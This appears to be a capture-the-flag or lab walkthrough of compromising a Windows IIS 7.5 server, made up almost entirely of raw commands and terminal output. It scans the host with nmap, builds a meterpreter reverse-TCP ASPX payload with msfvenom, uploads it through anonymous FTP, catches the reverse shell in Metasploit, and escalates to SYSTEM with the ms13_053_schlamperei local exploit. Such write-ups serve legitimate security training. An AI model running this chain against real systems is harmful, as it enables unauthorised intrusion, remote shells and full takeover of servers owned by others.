Starting Nmap 7.93 ( ) at 2022-12-21 21:06 MST
Nmap scan report for
Host is up (0.064s latency).
Not shown: 998 filtered tcp ports (no-response)
21/tcp open  ftp     Microsoft ftpd
| ftp-syst:
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  01:06AM       <DIR>          aspnet_client
| 03-17-17  04:37PM                  689 iisstart.htm
| 12-22-22  01:27AM               897112 r.aspx
| 12-22-22  01:17AM                 2921 rev.aspx
| 12-22-22  01:06AM                 2935 reverse.aspx
|_03-17-17  04:37PM               184946 welcome.png
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Nmap done: 1 IP address (1 host up) scanned in 20.11 seconds


Generate payload with msfvenom

msfvenom -p windows/meterpreter_reverse_tcp LHOST= LPORT=4444 -f aspx > r.aspx

Upload to FTP with anonymous login we noticed from nmap

❯ ftp anonymous@
Connected to
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
230 User logged in.
Remote system type is Windows_NT.
ftp> put r.aspx                                                                                                        
200 PORT command successful.  
125 Data connection already open; Transfer starting.
226 Transfer complete.
897112 bytes sent in 0.711 seconds (1.2 Mbytes/s)
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection.
03-18-17  01:06AM       <DIR>          aspnet_client
03-17-17  04:37PM                  689 iisstart.htm
12-22-22  01:27AM               897112 r.aspx
12-22-22  01:17AM                 2921 rev.aspx
12-22-22  01:06AM                 2935 reverse.aspx
03-17-17  04:37PM               184946 welcome.png
226 Transfer complete.
ftp> rm rev.aspx
550 The directory name is invalid.

Setup listener within metasploit and visit

msf6 exploit(multi/handler) > set lhost
lhost =>
msf6 exploit(multi/handler) > set payload windows/meterpreter_reverse_tcp
payload => windows/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/meterpreter_reverse_tcp):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   EXITFUNC    process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   EXTENSIONS                   no        Comma-separate list of extensions to load
   EXTINIT                      no        Initialization strings for extensions
   LHOST      yes       The listen address (an interface may be specified)
   LPORT       4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on
[*] Meterpreter session 1 opened ( -> at 2022-12-21 21:13:22 -0700

meterpreter >
meterpreter > getuid
Server username: IIS APPPOOL\Web

Privilege Escalation

Now search exploit suggester.

msf6 post(multi/recon/local_exploit_suggester) > set session 1                                                                                                                                                                                 
session => 1                                                                                                                                                                                                                                   
msf6 post(multi/recon/local_exploit_suggester) > exploit   
 #   Name                                                           Potentially Vulnerable?  Check Result                                                                                                                                      
 -   ----                                                           -----------------------  ------------                                                                                                                                      
 1   exploit/windows/local/bypassuac_eventvwr                       Yes                      The target appears to be vulnerable.                                                                                                              
 2   exploit/windows/local/ms10_015_kitrap0d                        Yes                      The service is running, but could not be validated.                                                                                               
 3   exploit/windows/local/ms10_092_schelevator                     Yes                      The service is running, but could not be validated.                                                                                               
 4   exploit/windows/local/ms13_053_schlamperei                     Yes                      The target appears to be vulnerable.                                                                                                              
 5   exploit/windows/local/ms13_081_track_popup_menu                Yes                      The target appears to be vulnerable.                                                                                                              
 6   exploit/windows/local/ms14_058_track_popup_menu                Yes                      The target appears to be vulnerable.                                                                                                              
 7   exploit/windows/local/ms15_004_tswbproxy                       Yes                      The service is running, but could not be validated.                                                                                               
 8   exploit/windows/local/ms15_051_client_copy_image               Yes                      The target appears to be vulnerable.                                                                                                              
 9   exploit/windows/local/ms16_016_webdav                          Yes                      The service is running, but could not be validated.                                                                                               
 10  exploit/windows/local/ms16_032_secondary_logon_handle_privesc  Yes                      The service is running, but could not be validated.                                                                                               
 11  exploit/windows/local/ms16_075_reflection                      Yes                      The target appears to be vulnerable.                                                                                                              
 12  exploit/windows/local/ntusermndragover                         Yes                      The target appears to be vulnerable.                                                                                                              
 13  exploit/windows/local/ppr_flatten_rec                          Yes                      The target appears to be vulnerable.

Winner winner!

msf6 exploit(windows/local/ms13_053_schlamperei) > exploit

[*] Started reverse TCP handler on
[*] Launching notepad to host the exploit...
[+] Process 2724 launched.
[*] Reflectively injecting the exploit DLL into 2724...
[*] Injecting exploit into 2724...
[*] Found winlogon.exe with PID 432
[*] Sending stage (175686 bytes) to
[+] Everything seems to have worked, cross your fingers and wait for a SYSTEM shell
[*] Meterpreter session 2 opened ( -> at 2022-12-21 21:23:35 -0700

meterpreter > getui
[-] Unknown command: getui
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM